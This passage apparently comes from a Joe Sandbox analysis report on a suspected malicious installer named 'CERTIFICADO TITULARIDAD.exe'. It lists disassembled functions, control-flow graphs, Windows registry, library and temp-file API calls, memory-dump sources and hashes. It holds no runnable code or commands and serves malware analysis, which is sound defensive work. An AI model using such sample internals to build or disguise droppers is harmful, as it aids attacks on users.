                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll
                                                                                                                          • API String ID: 2531174081-2907449222
                                                                                                                          • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                                                                          • Instruction ID: deb6953f75989b306d4e6df0e2073f5bc52164b7b2c012b705af3b177d86a23e
                                                                                                                          • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                                                                          • Instruction Fuzzy Hash: 8F21B375900158BACB119FA5DD84ECFBF75EF45364F50803AF944B22A0C77A4A51CF68

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 653 4032b9-4032d0 654 4032d2 653->654 655 4032d9-4032e1 653->655 654->655 656 4032e3 655->656 657 4032e8-4032ed 655->657 656->657 658 4032fd-40330a call 40349e 657->658 659 4032ef-4032f8 call 4034b4 657->659 663 403310-403314 658->663 664 403455 658->664 659->658 665 40331a-40333a GetTickCount call 406a70 663->665 666 40343e-403440 663->666 667 403457-403458 664->667 677 403494 665->677 679 403340-403348 665->679 668 403442-403445 666->668 669 403489-40348d 666->669 671 403497-40349b 667->671 672 403447 668->672 673 40344a-403453 call 40349e 668->673 674 40345a-403460 669->674 675 40348f 669->675 672->673 673->664 686 403491 673->686 680 403462 674->680 681 403465-403473 call 40349e 674->681 675->677 677->671 683 40334a 679->683 684 40334d-40335b call 40349e 679->684 680->681 681->664 690 403475-403481 call 4060c3 681->690 683->684 684->664 691 403361-40336a 684->691 686->677 696 403483-403486 690->696 697 40343a-40343c 690->697 693 403370-40338d call 406a90 691->693 699 403393-4033aa GetTickCount 693->699 700 403436-403438 693->700 696->669 697->667 701 4033f5-4033f7 699->701 702 4033ac-4033b4 699->702 700->667 703 4033f9-4033fd 701->703 704 40342a-40342e 701->704 705 4033b6-4033ba 702->705 706 4033bc-4033ed MulDiv wsprintfW call 4055a6 702->706 708 403412-403418 703->708 709 4033ff-403404 call 4060c3 703->709 704->679 710 403434 704->710 705->701 705->706 711 4033f2 706->711 713 40341e-403422 708->713 714 403409-40340b 709->714 710->677 711->701 713->693 715 403428 713->715 714->697 716 40340d-403410 714->716 715->677 716->713
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CountTick$wsprintf
                                                                                                                          • String ID: ... %d%%
                                                                                                                          • API String ID: 551687249-2449383134
                                                                                                                          • Opcode ID: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                                                                                          • Instruction ID: 25ee467b37f7358b1d8943912f63d539eb3ef7c07a249f5ee2dc3eaa61b9464a
                                                                                                                          • Opcode Fuzzy Hash: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                                                                                          • Instruction Fuzzy Hash: 5B518E31900219EBCB11DF65DA44BAF3FA8AB40726F14417BF804BB2C1D7789E408BA9

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 717 4068a5-4068c5 GetSystemDirectoryW 718 4068c7 717->718 719 4068c9-4068cb 717->719 718->719 720 4068dc-4068de 719->720 721 4068cd-4068d6 719->721 723 4068df-406912 wsprintfW LoadLibraryExW 720->723 721->720 722 4068d8-4068da 721->722 722->723
                                                                                                                          APIs
                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                                                                                          • wsprintfW.USER32 ref: 004068F7
                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                          • String ID: %s%S.dll$UXTHEME
                                                                                                                          • API String ID: 2200240437-1106614640
                                                                                                                          • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                          • Instruction ID: d40490b37a95929041f6b14fe17981fa15644a851550e805e000283098582d10
                                                                                                                          • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                          • Instruction Fuzzy Hash: 41F0FC31511119AACF10BB64DD0DF9B375C9B00305F10847AE546F10D0EB789A68CBA8

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 724 402eae-402ed7 call 40638e 726 402edc-402ee0 724->726 727 402f91-402f95 726->727 728 402ee6-402eea 726->728 729 402eec-402f0d RegEnumValueW 728->729 730 402f0f-402f22 728->730 729->730 731 402f76-402f84 RegCloseKey 729->731 732 402f4b-402f52 RegEnumKeyW 730->732 731->727 733 402f24-402f26 732->733 734 402f54-402f66 RegCloseKey call 406915 732->734 733->731 735 402f28-402f3c call 402eae 733->735 740 402f86-402f8c 734->740 741 402f68-402f74 RegDeleteKeyW 734->741 735->734 742 402f3e-402f4a 735->742 740->727 741->727 742->732
                                                                                                                          APIs
                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseEnum$DeleteValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1354259210-0
                                                                                                                          • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                                                          • Instruction ID: 48bf034c557530f45265713f896c64b121a5f1f2f5b25ab6521791cb913d5ed3
                                                                                                                          • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                                                          • Instruction Fuzzy Hash: 74215A7150010ABFDF119F90CE89EEF7B7DEB54388F110076B949B11A0D7B49E54AA68

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 743 73f71817-73f71856 call 73f71bff 747 73f71976-73f71978 743->747 748 73f7185c-73f71860 743->748 749 73f71862-73f71868 call 73f7243e 748->749 750 73f71869-73f71876 call 73f72480 748->750 749->750 755 73f718a6-73f718ad 750->755 756 73f71878-73f7187d 750->756 757 73f718af-73f718cb call 73f72655 call 73f71654 call 73f71312 GlobalFree 755->757 758 73f718cd-73f718d1 755->758 759 73f7187f-73f71880 756->759 760 73f71898-73f7189b 756->760 783 73f71925-73f71929 757->783 761 73f718d3-73f7191c call 73f71666 call 73f72655 758->761 762 73f7191e-73f71924 call 73f72655 758->762 765 73f71882-73f71883 759->765 766 73f71888-73f71889 call 73f72b98 759->766 760->755 763 73f7189d-73f7189e call 73f72e23 760->763 761->783 762->783 776 73f718a3 763->776 771 73f71885-73f71886 765->771 772 73f71890-73f71896 call 73f72810 765->772 779 73f7188e 766->779 771->755 771->766 782 73f718a5 772->782 776->782 779->776 782->755 786 73f71966-73f7196d 783->786 787 73f7192b-73f71939 call 73f72618 783->787 786->747 789 73f7196f-73f71970 GlobalFree 786->789 793 73f71951-73f71958 787->793 794 73f7193b-73f7193e 787->794 789->747 793->786 795 73f7195a-73f71965 call 73f715dd 793->795 794->793 796 73f71940-73f71948 794->796 795->786 796->793 798 73f7194a-73f7194b FreeLibrary 796->798 798->793
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 73F71BFF: GlobalFree.KERNEL32(?), ref: 73F71E74
                                                                                                                            • Part of subcall function 73F71BFF: GlobalFree.KERNEL32(?), ref: 73F71E79
                                                                                                                            • Part of subcall function 73F71BFF: GlobalFree.KERNEL32(?), ref: 73F71E7E
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 73F718C5
                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 73F7194B
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 73F71970
                                                                                                                            • Part of subcall function 73F7243E: GlobalAlloc.KERNEL32(00000040,?), ref: 73F7246F
                                                                                                                            • Part of subcall function 73F72810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73F71896,00000000), ref: 73F728E0
                                                                                                                            • Part of subcall function 73F71666: wsprintfW.USER32 ref: 73F71694
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2659336751.0000000073F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F70000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2659279507.0000000073F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659368168.0000000073F74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659420622.0000000073F76000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_73f70000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3962662361-3916222277
                                                                                                                          • Opcode ID: 87aeb9ea5f44627a64c60edce6f20edf4ea75307200d55a4b9b9b67a73708eac
                                                                                                                          • Instruction ID: 95022c77900bc069feb562780ba2afa807fcf328d626c16ff3a17724ab266fc6
                                                                                                                          • Opcode Fuzzy Hash: 87aeb9ea5f44627a64c60edce6f20edf4ea75307200d55a4b9b9b67a73708eac
                                                                                                                          • Instruction Fuzzy Hash: 98418072800746EBEB119F24DD88B9537FCEB053D0F984567E94B9A0DADB78808DC660

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 800 401c48-401c68 call 402d89 * 2 805 401c74-401c78 800->805 806 401c6a-401c71 call 402dab 800->806 808 401c84-401c8a 805->808 809 401c7a-401c81 call 402dab 805->809 806->805 812 401cd8-401d02 call 402dab * 2 FindWindowExW 808->812 813 401c8c-401ca8 call 402d89 * 2 808->813 809->808 823 401d08 812->823 824 401cc8-401cd6 SendMessageW 813->824 825 401caa-401cc6 SendMessageTimeoutW 813->825 826 401d0b-401d0e 823->826 824->823 825->826 827 401d14 826->827 828 402c2f-402c3e 826->828 827->828
                                                                                                                          APIs
                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                          • String ID: !
                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                          • Opcode ID: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                                                                                                                          • Instruction ID: dc9a0f57bab323a5eda2152a626e9899419b02716f24503a8b80c8a4184e75e9
                                                                                                                          • Opcode Fuzzy Hash: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                                                                                                                          • Instruction Fuzzy Hash: E921AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 831 40248f-4024c0 call 402dab * 2 call 402e3b 838 4024c6-4024d0 831->838 839 402c2f-402c3e 831->839 840 4024d2-4024df call 402dab lstrlenW 838->840 841 4024e3-4024e6 838->841 840->841 844 4024e8-4024f9 call 402d89 841->844 845 4024fa-4024fd 841->845 844->845 849 40250e-402522 RegSetValueExW 845->849 850 4024ff-402509 call 4032b9 845->850 853 402524 849->853 854 402527-402608 RegCloseKey 849->854 850->849 853->854 854->839
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nspD212.tmp,00000023,00000011,00000002), ref: 004024DA
                                                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nspD212.tmp,00000000,00000011,00000002), ref: 0040251A
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nspD212.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseValuelstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nspD212.tmp
                                                                                                                          • API String ID: 2655323295-722335715
                                                                                                                          • Opcode ID: 8e1b5111da33e5837339166b14f546e7548dccb5c0fd5daf16ba01e681e634b0
                                                                                                                          • Instruction ID: 9515a87f615354861ff9cc8d48f56862c3e7cd04d157db2ad705c0a1b7eb65e0
                                                                                                                          • Opcode Fuzzy Hash: 8e1b5111da33e5837339166b14f546e7548dccb5c0fd5daf16ba01e681e634b0
                                                                                                                          • Instruction Fuzzy Hash: 45116D71900118BEEB11EFA5DE59AAEBAB4AF54318F10443FF504B61C1C7B98E419A58
                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 0040605E
                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004034FA,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6), ref: 00406079
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                          • API String ID: 1716503409-1857211195
                                                                                                                          • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                          • Instruction ID: 4304e6ca34acc2e603ac9508cdf3fa98200610ac432ccd05af3fd9fdb7d66135
                                                                                                                          • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                          • Instruction Fuzzy Hash: 58F09676B40204FBDB10CF55ED05F9EB7ACEB95750F11403AEE05F7140E6B099548768
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405E9B: CharNextW.USER32(?,?,Forums.Mel,?,00405F0F,Forums.Mel,Forums.Mel, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"), ref: 00405EA9
                                                                                                                            • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                                                                            • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                                                                            • Part of subcall function 00405A75: CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405AB7
                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\subprovince,?,00000000,000000F0), ref: 00401652
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\subprovince, xrefs: 00401645
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                          • String ID: C:\Users\user\subprovince
                                                                                                                          • API String ID: 1892508949-2790155446
                                                                                                                          • Opcode ID: 7f503c08a0778f4355e9e2823a57a0c055de55569a85c0f729d9efbbf8a88517
                                                                                                                          • Instruction ID: ceaefb5432ba9a2b041ab88b04bec91c1a8495824eafa6d8534a6d53eb807851
                                                                                                                          • Opcode Fuzzy Hash: 7f503c08a0778f4355e9e2823a57a0c055de55569a85c0f729d9efbbf8a88517
                                                                                                                          • Instruction Fuzzy Hash: 2D11D031504604ABCF206FA5CD4099F36B0EF04368B29493FE941B22E1DA3E4E819E8E
                                                                                                                          APIs
                                                                                                                          • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Call,?,00000000,00406660,80000002), ref: 00406435
                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 00406440
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
